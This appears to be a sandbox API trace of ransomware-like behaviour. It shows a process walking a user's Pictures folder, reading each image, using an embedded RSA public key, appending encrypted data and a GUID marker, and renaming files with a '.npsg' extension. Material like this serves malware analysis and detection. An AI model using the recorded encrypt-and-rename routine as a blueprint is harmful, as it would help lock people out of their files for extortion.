[0239.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\") returned="lvw4jN8h\\" [0239.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\") returned="2DVGfW2 wBKbSvaIoJ2e\\" [0239.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0239.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.212] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.212] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.212] PathFindFileNameW (pszPath="") returned="" [0239.212] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb051cb30, ftCreationTime.dwHighDateTime=0x1d5c353, ftLastAccessTime.dwLowDateTime=0x5d2c2d60, ftLastAccessTime.dwHighDateTime=0x1d5bade, ftLastWriteTime.dwLowDateTime=0x5d2c2d60, ftLastWriteTime.dwHighDateTime=0x1d5bade, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0239.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.215] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb051cb30, ftCreationTime.dwHighDateTime=0x1d5c353, ftLastAccessTime.dwLowDateTime=0x5d2c2d60, ftLastAccessTime.dwHighDateTime=0x1d5bade, ftLastWriteTime.dwLowDateTime=0x5d2c2d60, ftLastWriteTime.dwHighDateTime=0x1d5bade, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0239.215] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd43f58e0, ftCreationTime.dwHighDateTime=0x1d5b747, ftLastAccessTime.dwLowDateTime=0xf2094f0, ftLastAccessTime.dwHighDateTime=0x1d5c2cf, ftLastWriteTime.dwLowDateTime=0xf2094f0, ftLastWriteTime.dwHighDateTime=0x1d5c2cf, nFileSizeHigh=0x0, nFileSizeLow=0x14d43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6g9Ggps5m-ZE3GpiJQUk.jpg", cAlternateFileName="6G9GGP~1.JPG")) returned 1 [0239.216] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\6g9Ggps5m-ZE3GpiJQUk.jpg") returned=".jpg" [0239.216] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\6g9Ggps5m-ZE3GpiJQUk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lvw4jn8h\\6g9ggps5m-ze3gpijquk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.216] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=85315) returned 1 [0239.216] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.219] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14d1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.219] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.221] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x14d43, lpOverlapped=0x0) returned 1 [0239.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.223] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.224] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.224] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.224] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.224] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.224] GetLastError () returned 0x0 [0239.224] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.224] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.225] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.225] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.225] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.225] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.226] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14d43, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.226] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.227] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.227] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.227] CloseHandle (hObject=0x644) returned 1 [0239.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0239.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8d0) returned 0x3b89cd0 [0239.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.229] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\6g9Ggps5m-ZE3GpiJQUk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lvw4jn8h\\6g9ggps5m-ze3gpijquk.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\6g9Ggps5m-ZE3GpiJQUk.jpg.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lvw4jn8h\\6g9ggps5m-ze3gpijquk.jpg.npsg")) returned 1 [0239.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.230] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0239.231] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cd81ad0, ftCreationTime.dwHighDateTime=0x1d5be7e, ftLastAccessTime.dwLowDateTime=0x5f8540, ftLastAccessTime.dwHighDateTime=0x1d5bc60, ftLastWriteTime.dwLowDateTime=0x5f8540, ftLastWriteTime.dwHighDateTime=0x1d5bc60, nFileSizeHigh=0x0, nFileSizeLow=0x66d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jU8Tvw diV.png", cAlternateFileName="JU8TVW~1.PNG")) returned 1 [0239.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0239.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.232] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\jU8Tvw diV.png") returned=".png" [0239.232] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\jU8Tvw diV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lvw4jn8h\\ju8tvw div.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.232] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=26320) returned 1 [0239.232] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.235] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x66aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.235] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.238] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.238] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x66d0, lpOverlapped=0x0) returned 1 [0239.239] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.239] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.239] lstrlenA (lpString="-----BEGIN PUBLIC 